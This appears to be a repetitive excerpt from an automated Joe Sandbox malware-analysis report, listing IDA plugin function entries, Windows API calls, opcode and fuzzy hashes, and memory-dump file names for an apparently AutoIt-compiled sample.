                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                        • String ID: 0$2
                                                                                                                                                                                                                                                                                        • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                        • Opcode ID: 07ac71b74d4ab64b56b3dfac302b085e8dd63e8035e78b0fb1396d4a5a212b48
                                                                                                                                                                                                                                                                                        • Instruction ID: 78ce0ef50c9a923da3c6e30819082fed6e4b04b882a796c75ba68199300ae72c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07ac71b74d4ab64b56b3dfac302b085e8dd63e8035e78b0fb1396d4a5a212b48
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E851D270A012059BDF10CF78C888BBEBBF4AF55324F24412AE9D597291D7709944EFE1
                                                                                                                                                                                                                                                                                        Function 00F6D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00F6D1BE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconLoad
                                                                                                                                                                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                        • Opcode ID: d0587a9ba410c618fd3624f7e65097dac7c5a5d4e90a49c0b0c10c98ae0ca1ad
                                                                                                                                                                                                                                                                                        • Instruction ID: 8f6f176c28d209ca902caac93ef2b6077627bfe36e47077921f1442939dbcc13
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0587a9ba410c618fd3624f7e65097dac7c5a5d4e90a49c0b0c10c98ae0ca1ad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8911B736F8831BBAF7055B54EC82EAA77AC9F07770B60002AF500E6181D7F4AA417561
                                                                                                                                                                                                                                                                                        Function 00F6E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                        • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                        • Opcode ID: fc838830f0f775e14e789b28ae720ff55a78d619a2b57c2ad24b04042aa457a5
                                                                                                                                                                                                                                                                                        • Instruction ID: 869ef55cadcbb74c79f460030ba3dd504c3fbcd72dd071bac49818f192792a98
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc838830f0f775e14e789b28ae720ff55a78d619a2b57c2ad24b04042aa457a5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A711E9369041297FDB20A774EC4AEDE77BCEF01720F110066F515A7091EFB89A81FA51
                                                                                                                                                                                                                                                                                        Function 00F6F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5cb0e9ef0915c5ebe3cd1725d66743d008254deabd46eb48c75b0f6c4b321d61
                                                                                                                                                                                                                                                                                        • Instruction ID: d592972d57e933d374b989e213dda49ca47804f11de7692a7707de04ad37313c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cb0e9ef0915c5ebe3cd1725d66743d008254deabd46eb48c75b0f6c4b321d61
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3341B765D11128B6CB11EBF8EC86ACFB7A8AF05310F508462E518E3121FB78E255D3E6
                                                                                                                                                                                                                                                                                        Function 00F1FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F439E2,00000004,00000000,00000000), ref: 00F1FC41
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F439E2,00000004,00000000,00000000), ref: 00F5FC15
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F439E2,00000004,00000000,00000000), ref: 00F5FC98
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ShowWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f6a0624561739a3e7bc24d1162149cae7044b2c045d9767123a4dc999438b9e2
                                                                                                                                                                                                                                                                                        • Instruction ID: 4e1c674b75bc38cadf6f4c79339b957a69a8007cdab85544774f704983665a34
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6a0624561739a3e7bc24d1162149cae7044b2c045d9767123a4dc999438b9e2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35413131A0838C9AC7358738C99CBEA3B91AB46321F24457DEE4747A70C6359ACDFB51
                                                                                                                                                                                                                                                                                        Function 00F9379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F937B7
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F937BF
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F937CA
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F937D6
                                                                                                                                                                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F93812
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F93823
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F96504,?,?,000000FF,00000000,?,000000FF,?), ref: 00F9385E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F9387D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3579e93b0f9c5546465bb27b0f491c78ae5fdc2edaf0d7210d4fe48129fd9bc6
                                                                                                                                                                                                                                                                                        • Instruction ID: 9c49ecd92eafc9734ab601686095781990a8bdb30205e9cea795db701e46aabd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3579e93b0f9c5546465bb27b0f491c78ae5fdc2edaf0d7210d4fe48129fd9bc6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8431A072601218BFEF154F50CC8AFEB3BADEF49761F144066FE089A191C6B59C41DBA1
                                                                                                                                                                                                                                                                                        Function 00F85A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                        • Opcode ID: cf65259f31f0ad2c2b390bc1ffbd59b50d4949406b52c8274bbdca37acb89a72
                                                                                                                                                                                                                                                                                        • Instruction ID: 92d7cc28e2410c51764d0ad987b1b3d1bdcd6aed66b2a206fdfa657618c8b638
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf65259f31f0ad2c2b390bc1ffbd59b50d4949406b52c8274bbdca37acb89a72
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72D1AE72A0060A9FDF10EFA8C885BEEB7B5FF48754F148069E915AB280E770ED45DB50
                                                                                                                                                                                                                                                                                        Function 00F418A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F4194E
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F419D1
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F41B7B,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F41A64
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F41A7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F33B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F26A79,?,0000015D,?,?,?,?,00F285B0,000000FF,00000000,?,?), ref: 00F33BC5
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F41AF7
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F41B22
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F41B2E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 277370171f0dedfceed0d3825d617f184b9d278a28e4c007dc8053cca1a479ec
                                                                                                                                                                                                                                                                                        • Instruction ID: 46e5e58260bec011edd72381d64c8f4d0de364a50c97fce6d7b89a0e0686b86a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 277370171f0dedfceed0d3825d617f184b9d278a28e4c007dc8053cca1a479ec
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E919272E0021A9ADB248E64CC95AEE7FB5FF49360F180669ED05E7141EB39DDC0E760
                                                                                                                                                                                                                                                                                        Function 00F84F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                        • Opcode ID: 931896463091d9eb7ec5a4d1e5b9abf1f77c514a50257eba8efe4d1f9b9c456e
                                                                                                                                                                                                                                                                                        • Instruction ID: f299cb9905004f77ea685f428d29d270d29b90b0d53d09c69c06403220556db0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 931896463091d9eb7ec5a4d1e5b9abf1f77c514a50257eba8efe4d1f9b9c456e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE919E71E00619ABDF20DFA4CC48FEEBBB8AF45B24F148559F505AB280D7709945DFA0
                                                                                                                                                                                                                                                                                        Function 00F71B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F71C1B
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71C43
                                                                                                                                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00F71C67
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71C97
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71D1E
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71D83
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71DEF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a4b014c05f40fe929c29c75e70f541f4cf5599e57c3e2c22fcf90b8d2a3ad2e0
                                                                                                                                                                                                                                                                                        • Instruction ID: b0b8f24ebc0b9286078d49bd764699dc75dd31138fd10ec62f6c308d47a7fa55
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4b014c05f40fe929c29c75e70f541f4cf5599e57c3e2c22fcf90b8d2a3ad2e0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B591F576A002199FDB01DF9CC884BFEB7B5FF04721F10801AE944E7291D778A949EB52
                                                                                                                                                                                                                                                                                        Function 00F843A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F843C8
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F844D7
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F844E7
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F8467C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7169E: VariantInit.OLEAUT32(00000000), ref: 00F716DE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7169E: VariantCopy.OLEAUT32(?,?), ref: 00F716E7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7169E: VariantClear.OLEAUT32(?), ref: 00F716F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                        • Opcode ID: 1ea18fe3bceb97909831c73a1f68c11181f35d19aacb0877d1aa016288d49586
                                                                                                                                                                                                                                                                                        • Instruction ID: 43c5db4f4d042d96aebcbfaf1c037de3753976d73768f70eebc5417543cdef43
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ea18fe3bceb97909831c73a1f68c11181f35d19aacb0877d1aa016288d49586
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A914A75A043029FC704EF24C8819AAB7E5FF89714F14892DF8899B351DB35ED46EB82
                                                                                                                                                                                                                                                                                        Function 00F8560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F608FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?,?,00F60C4E), ref: 00F6091B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F608FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60936
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F608FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60944
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F608FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?), ref: 00F60954
                                                                                                                                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00F856AE
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F857B6
                                                                                                                                                                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00F8582C
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 00F85837
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
